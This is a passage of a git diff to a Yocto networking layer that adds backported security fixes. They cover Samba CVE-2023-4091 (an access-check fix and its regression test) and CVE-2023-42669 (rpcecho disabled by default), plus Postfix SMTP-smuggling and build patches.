strlcpy(outpath, fake_path, 1024); ++ talloc_free(fake_path); + return; + } + +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-4091-0001.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-4091-0001.patch new file mode 100644 index 0000000000..908ab85baf --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-4091-0001.patch @@ -0,0 +1,193 @@ +From b08a60160e6ab8d982d31844bcbf7ab67ff3a8de Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Tue, 1 Aug 2023 12:30:00 +0200 +Subject: [PATCH 2/2] CVE-2023-4091: smbtorture: test overwrite dispositions on + read-only file + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15439 + +Signed-off-by: Ralph Boehme <slow@samba.org> + +CVE: CVE-2023-4091 + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/b08a60160e6ab8d982d31844bcbf7ab67ff3a8de] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + selftest/knownfail.d/samba3.smb2.acls | 1 + + source4/torture/smb2/acls.c | 145 ++++++++++++++++++++++++++ + 2 files changed, 146 insertions(+) + create mode 100644 selftest/knownfail.d/samba3.smb2.acls + +diff --git a/selftest/knownfail.d/samba3.smb2.acls b/selftest/knownfail.d/samba3.smb2.acls +new file mode 100644 +index 0000000..18df260 +--- /dev/null ++++ b/selftest/knownfail.d/samba3.smb2.acls +@@ -0,0 +1 @@ ++^samba3.smb2.acls.OVERWRITE_READ_ONLY_FILE +diff --git a/source4/torture/smb2/acls.c b/source4/torture/smb2/acls.c +index 4f4538b..d26caeb 100644 +--- a/source4/torture/smb2/acls.c ++++ b/source4/torture/smb2/acls.c +@@ -3023,6 +3023,149 @@ done: + return ret; + } + ++static bool test_overwrite_read_only_file(struct torture_context *tctx, ++ struct smb2_tree *tree) ++{ ++ NTSTATUS status; ++ struct smb2_create c; ++ const char *fname = BASEDIR "\\test_overwrite_read_only_file.txt"; ++ struct smb2_handle handle = {{0}}; ++ union smb_fileinfo q; ++ union smb_setfileinfo set; ++ struct security_descriptor *sd = NULL, *sd_orig = NULL; ++ const char *owner_sid = NULL; ++ int i; ++ bool ret = true; ++ ++ struct tcase { ++ int disposition; ++ const char *disposition_string; ++ NTSTATUS expected_status; ++ } tcases[] = { ++#define TCASE(d, s) { \ ++ .disposition = d, \ ++ .disposition_string = #d, \ ++ .expected_status = s, \ ++ } ++ TCASE(NTCREATEX_DISP_OPEN, NT_STATUS_OK), ++ TCASE(NTCREATEX_DISP_SUPERSEDE, NT_STATUS_ACCESS_DENIED), ++ TCASE(NTCREATEX_DISP_OVERWRITE, NT_STATUS_ACCESS_DENIED), ++ TCASE(NTCREATEX_DISP_OVERWRITE_IF, NT_STATUS_ACCESS_DENIED), ++ }; ++#undef TCASE ++ ++ ret = smb2_util_setup_dir(tctx, tree, BASEDIR); ++ torture_assert_goto(tctx, ret, ret, done, "smb2_util_setup_dir not ok"); ++ ++ c = (struct smb2_create) { ++ .in.desired_access = SEC_STD_READ_CONTROL | ++ SEC_STD_WRITE_DAC | ++ SEC_STD_WRITE_OWNER, ++ .in.file_attributes = FILE_ATTRIBUTE_NORMAL, ++ .in.share_access = NTCREATEX_SHARE_ACCESS_READ | ++ NTCREATEX_SHARE_ACCESS_WRITE, ++ .in.create_disposition = NTCREATEX_DISP_OPEN_IF, ++ .in.impersonation_level = NTCREATEX_IMPERSONATION_ANONYMOUS, ++ .in.fname = fname, ++ }; ++ ++ status = smb2_create(tree, tctx, &c); ++ torture_assert_ntstatus_ok_goto(tctx, status, ret, done, ++ "smb2_create failed\n"); ++ handle = c.out.file.handle; ++ ++ torture_comment(tctx, "get the original sd\n"); ++ ++ ZERO_STRUCT(q); ++ q.query_secdesc.level = RAW_FILEINFO_SEC_DESC; ++ q.query_secdesc.in.file.handle = handle; ++ q.query_secdesc.in.secinfo_flags = SECINFO_DACL | SECINFO_OWNER; ++ ++ status = smb2_getinfo_file(tree, tctx, &q); ++ torture_assert_ntstatus_ok_goto(tctx, status, ret, done, ++ "smb2_getinfo_file failed\n"); ++ sd_orig = q.query_secdesc.out.sd; ++ ++ owner_sid = dom_sid_string(tctx, sd_orig->owner_sid); ++ ++ sd = security_descriptor_dacl_create(tctx, ++ 0, NULL, NULL, ++ owner_sid, ++ SEC_ACE_TYPE_ACCESS_ALLOWED, ++ SEC_FILE_READ_DATA, ++ 0, ++ NULL); ++ ++ ZERO_STRUCT(set); ++ set.set_secdesc.level = RAW_SFILEINFO_SEC_DESC; ++ set.set_secdesc.in.file.handle = handle; ++ set.set_secdesc.in.secinfo_flags = SECINFO_DACL; ++ set.set_secdesc.in.sd = sd; ++ ++ status = smb2_setinfo_file(tree, &set); ++ torture_assert_ntstatus_ok_goto(tctx, status, ret, done, ++ "smb2_setinfo_file failed\n"); ++ ++ smb2_util_close(tree, handle); ++ ZERO_STRUCT(handle); ++ ++ for (i = 0; i < ARRAY_SIZE(tcases); i++) { ++ torture_comment(tctx, "Verify open with %s dispostion\n", ++ tcases[i].disposition_string); ++ ++ c = (struct smb2_create) { ++ .in.create_disposition = tcases[i].disposition, ++ .in.desired_access = SEC_FILE_READ_DATA, ++ .in.file_attributes = FILE_ATTRIBUTE_NORMAL, ++ .in.share_access = NTCREATEX_SHARE_ACCESS_MASK, ++ .in.impersonation_level = NTCREATEX_IMPERSONATION_ANONYMOUS, ++ .in.fname = fname, ++ }; ++ ++ status = smb2_create(tree, tctx, &c); ++ smb2_util_close(tree, c.out.file.handle); ++ torture_assert_ntstatus_equal_goto( ++ tctx, status, tcases[i].expected_status, ret, done, ++ "smb2_create failed\n"); ++ }; ++ ++ torture_comment(tctx, "put back original sd\n"); ++ ++ c = (struct smb2_create) { ++ .in.desired_access = SEC_STD_WRITE_DAC, ++ .in.file_attributes = FILE_ATTRIBUTE_NORMAL, ++ .in.share_access = NTCREATEX_SHARE_ACCESS_MASK, ++ .in.create_disposition = NTCREATEX_DISP_OPEN_IF, ++ .in.impersonation_level = NTCREATEX_IMPERSONATION_ANONYMOUS, ++ .in.fname = fname, ++ }; ++ ++ status = smb2_create(tree, tctx, &c); ++ torture_assert_ntstatus_ok_goto(tctx, status, ret, done, ++ "smb2_create failed\n"); ++ handle = c.out.file.handle; ++ ++ ZERO_STRUCT(set); ++ set.set_secdesc.level = RAW_SFILEINFO_SEC_DESC; ++ set.set_secdesc.in.file.handle = handle; ++ set.set_secdesc.in.secinfo_flags = SECINFO_DACL; ++ set.set_secdesc.in.sd = sd_orig; ++ ++ status = smb2_setinfo_file(tree, &set); ++ torture_assert_ntstatus_ok_goto(tctx, status, ret, done, ++ "smb2_setinfo_file failed\n"); ++ ++ smb2_util_close(tree, handle); ++ ZERO_STRUCT(handle); ++ ++done: ++ smb2_util_close(tree, handle); ++ smb2_util_unlink(tree, fname); ++ smb2_deltree(tree, BASEDIR); ++ return ret; ++} ++ ++ + /* + basic testing of SMB2 ACLs + */ +@@ -3051,6 +3194,8 @@ struct torture_suite *torture_smb2_acls_init(TALLOC_CTX *ctx) + test_deny1); + torture_suite_add_1smb2_test(suite, "MXAC-NOT-GRANTED", + test_mxac_not_granted); ++ torture_suite_add_1smb2_test(suite, "OVERWRITE_READ_ONLY_FILE", ++ test_overwrite_read_only_file); + + suite->description = talloc_strdup(suite, "SMB2-ACLS tests"); + +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-4091-0002.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-4091-0002.patch new file mode 100644 index 0000000000..43d3b4929f --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-4091-0002.patch @@ -0,0 +1,59 @@ +From 8b26f634372f11edcbea33dfd68a3d57889dfcc5 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Tue, 1 Aug 2023 13:04:36 +0200 +Subject: [PATCH] CVE-2023-4091: smbd: use open_access_mask for access check in + open_file() + +If the client requested FILE_OVERWRITE[_IF], we're implicitly adding +FILE_WRITE_DATA to the open_access_mask in open_file_ntcreate(), but for the +access check we're using access_mask which doesn't contain the additional +right, which means we can end up truncating a file for which the user has +only read-only access via an SD. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15439 + +Signed-off-by: Ralph Boehme <slow@samba.org> + +CVE: CVE-2023-4091 + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/8b26f634372f11edcbea33dfd68a3d57889dfcc5] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + selftest/knownfail.d/samba3.smb2.acls | 1 - + source3/smbd/open.c | 4 ++-- + 2 files changed, 2 insertions(+), 3 deletions(-) + delete mode 100644 selftest/knownfail.d/samba3.smb2.acls + +diff --git a/selftest/knownfail.d/samba3.smb2.acls b/selftest/knownfail.d/samba3.smb2.acls +deleted file mode 100644 +index 18df260..0000000 +--- a/selftest/knownfail.d/samba3.smb2.acls ++++ /dev/null +@@ -1 +0,0 @@ +-^samba3.smb2.acls.OVERWRITE_READ_ONLY_FILE +diff --git a/source3/smbd/open.c b/source3/smbd/open.c +index 2c3bf9e..4bec5cb 100644 +--- a/source3/smbd/open.c ++++ b/source3/smbd/open.c +@@ -1402,7 +1402,7 @@ static NTSTATUS open_file(files_struct *fsp, + conn->cwd_fsp, + smb_fname, + false, +- access_mask); ++ open_access_mask); + + if (!NT_STATUS_IS_OK(status)) { + DEBUG(10, ("open_file: " +@@ -1585,7 +1585,7 @@ static NTSTATUS open_file(files_struct *fsp, + conn->cwd_fsp, + smb_fname, + false, +- access_mask); ++ open_access_mask); + + if (NT_STATUS_EQUAL(status, NT_STATUS_OBJECT_NAME_NOT_FOUND) && + (fsp->posix_flags & FSP_POSIX_FLAGS_OPEN) && +-- +2.40.0 + diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-42669.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-42669.patch new file mode 100644 index 0000000000..dfa6aeb023 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-42669.patch @@ -0,0 +1,94 @@ +From 9989568b20c8f804140c22f51548d766a18ed887 Mon Sep 17 00:00:00 2001 +From: Andrew Bartlett <abartlet@samba.org> +Date: Tue, 12 Sep 2023 18:59:44 +1200 +Subject: [PATCH] CVE-2023-42669 s4-rpc_server: Disable rpcecho server by + default + +The rpcecho server is useful in development and testing, but should never +have been allowed into production, as it includes the facility to +do a blocking sleep() in the single-threaded rpc worker. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15474 + +Signed-off-by: Andrew Bartlett <abartlet@samba.org> + +CVE: CVE-2023-42669 + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/9989568b20c8f804140c22f51548d766a18ed887] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + docs-xml/smbdotconf/protocol/dcerpcendpointservers.xml | 2 +- + lib/param/loadparm.c | 2 +- + selftest/target/Samba4.pm | 2 +- + source3/param/loadparm.c | 2 +- + source4/rpc_server/wscript_build | 3 ++- + 5 files changed, 6 insertions(+), 5 deletions(-) + +diff --git a/docs-xml/smbdotconf/protocol/dcerpcendpointservers.xml b/docs-xml/smbdotconf/protocol/dcerpcendpointservers.xml +index 8a217cc..c6642b7 100644 +--- a/docs-xml/smbdotconf/protocol/dcerpcendpointservers.xml ++++ b/docs-xml/smbdotconf/protocol/dcerpcendpointservers.xml +@@ -6,6 +6,6 @@ + <para>Specifies which DCE/RPC endpoint servers should be run.</para> + </description> + +-<value type="default">epmapper, wkssvc, rpcecho, samr, netlogon, lsarpc, drsuapi, dssetup, unixinfo, browser, eventlog6, backupkey, dnsserver</value> ++<value type="default">epmapper, wkssvc, samr, netlogon, lsarpc, drsuapi, dssetup, unixinfo, browser, eventlog6, backupkey, dnsserver</value> + <value type="example">rpcecho</value> + </samba:parameter> +diff --git a/lib/param/loadparm.c b/lib/param/loadparm.c +index eedfa00..75687f5 100644 +--- a/lib/param/loadparm.c ++++ b/lib/param/loadparm.c +@@ -2717,7 +2717,7 @@ struct loadparm_context *loadparm_init(TALLOC_CTX *mem_ctx) + lpcfg_do_global_parameter(lp_ctx, "ntvfs handler", "unixuid default"); + lpcfg_do_global_parameter(lp_ctx, "max connections", "0"); + +- lpcfg_do_global_parameter(lp_ctx, "dcerpc endpoint servers", "epmapper wkssvc rpcecho samr netlogon lsarpc drsuapi dssetup unixinfo browser eventlog6 backupkey dnsserver"); ++ lpcfg_do_global_parameter(lp_ctx, "dcerpc endpoint servers", "epmapper wkssvc samr netlogon lsarpc drsuapi dssetup unixinfo browser eventlog6 backupkey dnsserver"); + lpcfg_do_global_parameter(lp_ctx, "server services", "s3fs rpc nbt wrepl ldap cldap kdc drepl winbindd ntp_signd kcc dnsupdate dns"); + lpcfg_do_global_parameter(lp_ctx, "kccsrv:samba_kcc", "true"); + /* the winbind method for domain controllers is for both RODC +diff --git a/selftest/target/Samba4.pm b/selftest/target/Samba4.pm +index 651faa7..c7b33d2 100755 +--- a/selftest/target/Samba4.pm ++++ b/selftest/target/Samba4.pm +@@ -773,7 +773,7 @@ sub provision_raw_step1($$) + wins support = yes + server role = $ctx->{server_role} + server services = +echo $services +- dcerpc endpoint servers = +winreg +srvsvc ++ dcerpc endpoint servers = +winreg +srvsvc +rpcecho + notify:inotify = false + ldb:nosync = true + ldap server require strong auth = yes +diff --git a/source3/param/loadparm.c b/source3/param/loadparm.c +index 8bcd35f..a99ab35 100644 +--- a/source3/param/loadparm.c ++++ b/source3/param/loadparm.c +@@ -879,7 +879,7 @@ static void init_globals(struct loadparm_context *lp_ctx, bool reinit_globals) + + Globals.server_services = str_list_make_v3_const(NULL, "s3fs rpc nbt wrepl ldap cldap kdc drepl winbindd ntp_signd kcc dnsupdate dns", NULL); + +- Globals.dcerpc_endpoint_servers = str_list_make_v3_const(NULL, "epmapper wkssvc rpcecho samr netlogon lsarpc drsuapi dssetup unixinfo browser eventlog6 backupkey dnsserver", NULL); ++ Globals.dcerpc_endpoint_servers = str_list_make_v3_const(NULL, "epmapper wkssvc samr netlogon lsarpc drsuapi dssetup unixinfo browser eventlog6 backupkey dnsserver", NULL); + + Globals.tls_enabled = true; + Globals.tls_verify_peer = TLS_VERIFY_PEER_AS_STRICT_AS_POSSIBLE; +diff --git a/source4/rpc_server/wscript_build b/source4/rpc_server/wscript_build +index 8c75672..a2520da 100644 +--- a/source4/rpc_server/wscript_build ++++ b/source4/rpc_server/wscript_build +@@ -29,7 +29,8 @@ bld.SAMBA_MODULE('dcerpc_rpcecho', + source='echo/rpc_echo.c', + subsystem='dcerpc_server', + init_function='dcerpc_server_rpcecho_init', +- deps='ndr-standard events' ++ deps='ndr-standard events', ++ enabled=bld.CONFIG_GET('ENABLE_SELFTEST') + ) + + +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba_4.14.14.bb b/meta-networking/recipes-connectivity/samba/samba_4.14.14.bb index 53526a26b6..2fb93be0a9 100644 --- a/meta-networking/recipes-connectivity/samba/samba_4.14.14.bb +++ b/meta-networking/recipes-connectivity/samba/samba_4.14.14.bb @@ -22,6 +22,43 @@ SRC_URI = "${SAMBA_MIRROR}/stable/samba-${PV}.tar.gz \ file://0005-samba-build-dnsserver_common-code.patch \ file://0001-Fix-pyext_PATTERN-for-cross-compilation.patch \ file://0001-smbtorture-skip-test-case-tfork_cmd_send.patch \ + file://CVE-2022-3437-0001.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0002.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0003.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0004.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0005.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0006.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0007.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0008.patch;patchdir=source4/heimdal \ + file://CVE-2022-45142.patch;patchdir=source4/heimdal \ + file://CVE-2022-41916.patch;patchdir=source4/heimdal \ + file://CVE-2021-44758.patch;patchdir=source4/heimdal \ + file://CVE-2023-34966_0001.patch \ + file://CVE-2023-34966_0002.patch \ + file://CVE-2022-2127.patch \ + file://CVE-2023-34967_0001.patch \ + file://CVE-2023-34967_0002.patch \ + file://CVE-2023-34968_0001.patch \ + file://CVE-2023-34968_0002.patch \ + file://CVE-2023-34968_0003.patch \ + file://CVE-2023-34968_0004.patch \ + file://CVE-2023-34968_0005.patch \ + file://CVE-2023-34968_0006.patch \ + file://CVE-2023-34968_0007.patch \ + file://CVE-2023-34968_0008.patch \ + file://CVE-2023-34968_0009.patch \ + file://CVE-2023-34968_0010.patch \ + file://CVE-2023-34968_0011.patch \ + file://CVE-2023-4091-0001.patch \ + file://CVE-2023-4091-0002.patch \ + file://CVE-2023-42669.patch \ + file://CVE-2018-14628-0001.patch \ + file://CVE-2018-14628-0002.patch \ + file://CVE-2018-14628-0003.patch \ + file://CVE-2018-14628-0004.patch \ + file://CVE-2018-14628-0005.patch \ + file://CVE-2018-14628-0006.patch \ + file://CVE-2023-0922.patch \ " SRC_URI:append:libc-musl = " \ diff --git a/meta-networking/recipes-daemons/cyrus-sasl/cyrus-sasl_2.1.28.bb b/meta-networking/recipes-daemons/cyrus-sasl/cyrus-sasl_2.1.28.bb index e344733ef4..3fc1b0fd17 100644 --- a/meta-networking/recipes-daemons/cyrus-sasl/cyrus-sasl_2.1.28.bb +++ b/meta-networking/recipes-daemons/cyrus-sasl/cyrus-sasl_2.1.28.bb @@ -73,6 +73,7 @@ do_install:append() { } USERADD_PACKAGES = "${PN}-bin" +GROUPADD_PARAM:${PN}-bin = "--system mail" USERADD_PARAM:${PN}-bin = "--system --home=/var/spool/mail -g mail cyrus" SYSTEMD_PACKAGES = "${PN}-bin" diff --git a/meta-networking/recipes-daemons/postfix/files/0006-makedefs-Account-for-linux-6.x-version.patch b/meta-networking/recipes-daemons/postfix/files/0006-makedefs-Account-for-linux-6.x-version.patch new file mode 100644 index 0000000000..ad1704520c --- /dev/null +++ b/meta-networking/recipes-daemons/postfix/files/0006-makedefs-Account-for-linux-6.x-version.patch @@ -0,0 +1,35 @@ +From e5ddcf9575437bacd64c2b68501b413014186a6a Mon Sep 17 00:00:00 2001 +From: Khem Raj <raj.khem@gmail.com> +Date: Wed, 19 Oct 2022 10:15:01 -0700 +Subject: [PATCH] makedefs: Account for linux 6.x version + +Major version has bumped to 6 and script needs to know that + +Upstream-Status: Pending +Signed-off-by: Khem Raj <raj.khem@gmail.com> +--- + makedefs | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/makedefs ++++ b/makedefs +@@ -613,7 +613,7 @@ EOF + : ${SHLIB_ENV="LD_LIBRARY_PATH=`pwd`/lib"} + : ${PLUGIN_LD="${CC-gcc} -shared"} + ;; +- Linux.[345].*) SYSTYPE=LINUX$RELEASE_MAJOR ++ Linux.[3-6]*) SYSTYPE=LINUX$RELEASE_MAJOR + case "$CCARGS" in + *-DNO_DB*) ;; + *-DHAS_DB*) ;; +--- a/src/util/sys_defs.h ++++ b/src/util/sys_defs.h +@@ -751,7 +751,7 @@ extern int initgroups(const char *, int) + /* + * LINUX. + */ +-#if defined(LINUX2) || defined(LINUX3) || defined(LINUX4) || defined(LINUX5) ++#if defined(LINUX2) || defined(LINUX3) || defined(LINUX4) || defined(LINUX5) || defined(LINUX6) + #define SUPPORTED + #define UINT32_TYPE unsigned int + #define UINT16_TYPE unsigned short diff --git a/meta-networking/recipes-daemons/postfix/files/CVE-2023-51764-1.patch b/meta-networking/recipes-daemons/postfix/files/CVE-2023-51764-1.patch new file mode 100644 index 0000000000..65436b704e --- /dev/null +++ b/meta-networking/recipes-daemons/postfix/files/CVE-2023-51764-1.patch @@ -0,0 +1,377 @@ +From a6596ec37a4892e1d9c2498ecbfc4b8e6be5156a Mon Sep 17 00:00:00 2001 +From: Wietse Venema <wietse@porcupine.org> +Date: Fri, 22 Dec 2023 00:00:00 -0500 +Subject: [PATCH] postfix-3.6.13 +--- +Upstream-Status: Backport from [https://launchpad.net/ubuntu/+source/postfix/3.6.4-1ubuntu1.3] +CVE: CVE-2023-51764 +Signed-off-by: Ashish Sharma <asharma@mvista.com> + + man/man5/postconf.5 | 55 +++++++++++++++++++++++++++++++++++++++++++++++ + man/man8/smtpd.8 | 9 +++++++ + mantools/postlink | 2 + + proto/postconf.proto | 52 ++++++++++++++++++++++++++++++++++++++++++++ + src/global/mail_params.h | 11 ++++++++- + src/global/smtp_stream.c | 14 +++++++++++ + src/global/smtp_stream.h | 2 + + src/smtpd/smtpd.c | 42 +++++++++++++++++++++++++++++++++++ + 8 files changed, 185 insertions(+), 2 deletions(-) + +--- a/man/man5/postconf.5 ++++ b/man/man5/postconf.5 +@@ -10412,6 +10412,61 @@ + parameter $name expansion. + .PP + This feature is available in Postfix 2.0 and later. ++.SH smtpd_forbid_bare_newline (default: Postfix < 3.9: no) ++Reply with "Error: bare <LF> received" and disconnect ++when a remote SMTP client sends a line ending in <LF>, violating ++the RFC 5321 requirement that lines must end in <CR><LF>. ++This feature is disbled by default with Postfix < 3.9. Use ++smtpd_forbid_bare_newline_exclusions to exclude non\-standard clients ++such as netcat. Specify "smtpd_forbid_bare_newline = no" to disable ++(not recommended for an Internet\-connected MTA). ++.PP ++See ++https://www.postfix.org/smtp\-smuggling.html for details. ++.PP ++Example: ++.sp ++.in +4 ++.nf ++.na ++.ft C ++# Disconnect remote SMTP clients that send bare newlines, but allow ++# local clients with non\-standard SMTP implementations such as netcat, ++# fax machines, or load balancer health checks. ++# ++smtpd_forbid_bare_newline = yes ++smtpd_forbid_bare_newline_exclusions = $mynetworks ++.fi ++.ad ++.ft R ++.in -4 ++.PP ++This feature is available in Postfix >= 3.9, 3.8.4, 3.7.9, ++3.6.13, and 3.5.23. ++.SH smtpd_forbid_bare_newline_exclusions (default: $mynetworks) ++Exclude the specified clients from smtpd_forbid_bare_newline ++enforcement. It uses the same syntax and parent\-domain matching ++behavior as mynetworks. ++.PP ++Example: ++.sp ++.in +4 ++.nf ++.na ++.ft C ++# Disconnect remote SMTP clients that send bare newlines, but allow ++# local clients with non\-standard SMTP implementations such as netcat, ++# fax machines, or load balancer health checks. ++# ++smtpd_forbid_bare_newline = yes ++smtpd_forbid_bare_newline_exclusions = $mynetworks ++.fi ++.ad ++.ft R ++.in -4 ++.PP ++This feature is available in Postfix >= 3.9, 3.8.4, 3.7.9, ++3.6.13, and 3.5.23. + .SH smtpd_forbidden_commands (default: CONNECT, GET, POST) + List of commands that cause the Postfix SMTP server to immediately + terminate the session with a 221 code. This can be used to disconnect +--- a/man/man8/smtpd.8 ++++ b/man/man8/smtpd.8 +@@ -808,6 +808,15 @@ + The maximal number of AUTH commands that any client is allowed to + send to this service per time unit, regardless of whether or not + Postfix actually accepts those commands. ++.PP ++Available in Postfix 3.9, 3.8.4, 3.7.9, 3.6.13, 3.5.23 and later: ++.IP "\fBsmtpd_forbid_bare_newline (Postfix < 3.9: no)\fR" ++Reply with "Error: bare <LF> received" and disconnect ++when a remote SMTP client sends a line ending in <LF>, violating ++the RFC 5321 requirement that lines must end in <CR><LF>. ++.IP "\fBsmtpd_forbid_bare_newline_exclusions ($mynetworks)\fR" ++Exclude the specified clients from smtpd_forbid_bare_newline ++enforcement. + .SH "TARPIT CONTROLS" + .na + .nf +--- a/mantools/postlink ++++ b/mantools/postlink +@@ -547,6 +547,8 @@ + s;\bsmtpd_error_sleep_time\b;<a href="postconf.5.html#smtpd_error_sleep_time">$&</a>;g; + s;\bsmtpd_etrn_restrictions\b;<a href="postconf.5.html#smtpd_etrn_restrictions">$&</a>;g; + s;\bsmtpd_expansion_filter\b;<a href="postconf.5.html#smtpd_expansion_filter">$&</a>;g; ++ s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_newline\b;<a href="postconf.5.html#smtpd_forbi d_bare_newline">$&</a>;g; ++ s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_newline_exclusions\b;<a href="postconf.5.html# smtpd_forbid_bare_newline_exclusions">$&</a>;g; + s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bidden_commands\b;<a href="postconf.5.html#smtpd_forbidden_commands">$&</a>;g; + s;\bsmtpd_hard_error_limit\b;<a href="postconf.5.html#smtpd_hard_error_limit">$&</a>;g; + s;\bsmtpd_helo_required\b;<a href="postconf.5.html#smtpd_helo_required">$&</a>;g; +--- a/proto/postconf.proto ++++ b/proto/postconf.proto +@@ -18058,3 +18058,55 @@ + name or port number. </p> + + <p> This feature is available in Postfix 3.6 and later. </p> ++ ++%PARAM smtpd_forbid_bare_newline Postfix < 3.9: no ++ ++<p> Reply with "Error: bare <LF> received" and disconnect ++when a remote SMTP client sends a line ending in <LF>, violating ++the RFC 5321 requirement that lines must end in <CR><LF>. ++This feature is disbled by default with Postfix < 3.9. Use ++smtpd_forbid_bare_newline_exclusions to exclude non-standard clients ++such as netcat. Specify "smtpd_forbid_bare_newline = no" to disable ++(not recommended for an Internet-connected MTA). </p> ++ ++<p> See <a href="https://www.postfix.org/smtp-smuggling.html"> ++https://www.postfix.org/smtp-smuggling.html</a> for details. ++ ++<p> Example: </p> ++ ++<blockquote> ++<pre> ++# Disconnect remote SMTP clients that send bare newlines, but allow ++# local clients with non-standard SMTP implementations such as netcat, ++# fax machines, or load balancer health checks. ++# ++smtpd_forbid_bare_newline = yes ++smtpd_forbid_bare_newline_exclusions = $mynetworks ++</pre> ++</blockquote> ++ ++<p> This feature is available in Postfix ≥ 3.9, 3.8.4, 3.7.9, ++3.6.13, and 3.5.23. </p> ++ ++%PARAM smtpd_forbid_bare_newline_exclusions $mynetworks ++ ++<p> Exclude the specified clients from smtpd_forbid_bare_newline ++enforcement. It uses the same syntax and parent-domain matching ++behavior as mynetworks. </p> ++ ++<p> Example: </p> ++ ++<blockquote> ++<pre> ++# Disconnect remote SMTP clients that send bare newlines, but allow ++# local clients with non-standard SMTP implementations such as netcat, ++# fax machines, or load balancer health checks. ++# ++smtpd_forbid_bare_newline = yes ++smtpd_forbid_bare_newline_exclusions = $mynetworks ++</pre> ++</blockquote> ++ ++<p> This feature is available in Postfix ≥ 3.9, 3.8.4, 3.7.9, ++3.6.13, and 3.5.23. </p> ++ +--- a/src/global/mail_params.h ++++ b/src/global/mail_params.h +@@ -4170,7 +4170,16 @@ + extern char *var_smtpd_dns_re_filter; + + /* +- * Share TLS sessions through tlproxy(8). ++ * Backwards compatibility. ++ */ ++#define VAR_SMTPD_FORBID_BARE_LF "smtpd_forbid_bare_newline" ++#define DEF_SMTPD_FORBID_BARE_LF 0 ++ ++#define VAR_SMTPD_FORBID_BARE_LF_EXCL "smtpd_forbid_bare_newline_exclusions" ++#define DEF_SMTPD_FORBID_BARE_LF_EXCL "$" VAR_MYNETWORKS ++ ++ /* ++ * Share TLS sessions through tlsproxy(8). + */ + #define VAR_SMTP_TLS_CONN_REUSE "smtp_tls_connection_reuse" + #define DEF_SMTP_TLS_CONN_REUSE 0 +--- a/src/global/smtp_stream.c ++++ b/src/global/smtp_stream.c +@@ -50,6 +50,8 @@ + /* VSTREAM *stream; + /* char *format; + /* va_list ap; ++/* ++/* int smtp_forbid_bare_lf; + /* AUXILIARY API + /* int smtp_get_noexcept(vp, stream, maxlen, flags) + /* VSTRING *vp; +@@ -124,11 +126,16 @@ + /* smtp_vprintf() is the machine underneath smtp_printf(). + /* + /* smtp_get_noexcept() implements the subset of smtp_get() +-/* without timeouts and without making long jumps. Instead, ++/* without long jumps for timeout or EOF errors. Instead, + /* query the stream status with vstream_feof() etc. ++/* This function will make a VSTREAM long jump (error code ++/* SMTP_ERR_LF) when rejecting input with a bare newline byte. + /* + /* smtp_timeout_setup() is a backwards-compatibility interface + /* for programs that don't require per-record deadline support. ++/* ++/* smtp_forbid_bare_lf controls whether smtp_get_noexcept() ++/* will reject input with a bare newline byte. + /* DIAGNOSTICS + /* .fi + /* .ad +@@ -201,6 +208,8 @@ + + #include "smtp_stream.h" + ++int smtp_forbid_bare_lf; ++ + /* smtp_timeout_reset - reset per-stream error flags, restart deadline timer */ + + static void smtp_timeout_reset(VSTREAM *stream) +@@ -404,6 +413,9 @@ + */ + case '\n': + vstring_truncate(vp, VSTRING_LEN(vp) - 1); ++ if (smtp_forbid_bare_lf ++ && (VSTRING_LEN(vp) == 0 || vstring_end(vp)[-1] != '\r')) ++ vstream_longjmp(stream, SMTP_ERR_LF); + while (VSTRING_LEN(vp) > 0 && vstring_end(vp)[-1] == '\r') + vstring_truncate(vp, VSTRING_LEN(vp) - 1); + VSTRING_TERMINATE(vp); +--- a/src/global/smtp_stream.h ++++ b/src/global/smtp_stream.h +@@ -32,6 +32,7 @@ + #define SMTP_ERR_QUIET 3 /* silent cleanup (application) */ + #define SMTP_ERR_NONE 4 /* non-error case */ + #define SMTP_ERR_DATA 5 /* application data error */ ++#define SMTP_ERR_LF 6 /* bare <LF> protocol error */ + + extern void smtp_stream_setup(VSTREAM *, int, int); + extern void PRINTFLIKE(2, 3) smtp_printf(VSTREAM *, const char *,...); +@@ -43,6 +44,7 @@ + extern void smtp_fwrite(const char *, ssize_t len, VSTREAM *); + extern void smtp_fread_buf(VSTRING *, ssize_t len, VSTREAM *); + extern void smtp_fputc(int, VSTREAM *); ++extern int smtp_forbid_bare_lf; + + extern void smtp_vprintf(VSTREAM *, const char *, va_list); + +--- a/src/smtpd/smtpd.c ++++ b/src/smtpd/smtpd.c +@@ -762,6 +762,15 @@ + /* The maximal number of AUTH commands that any client is allowed to + /* send to this service per time unit, regardless of whether or not + /* Postfix actually accepts those commands. ++/* .PP 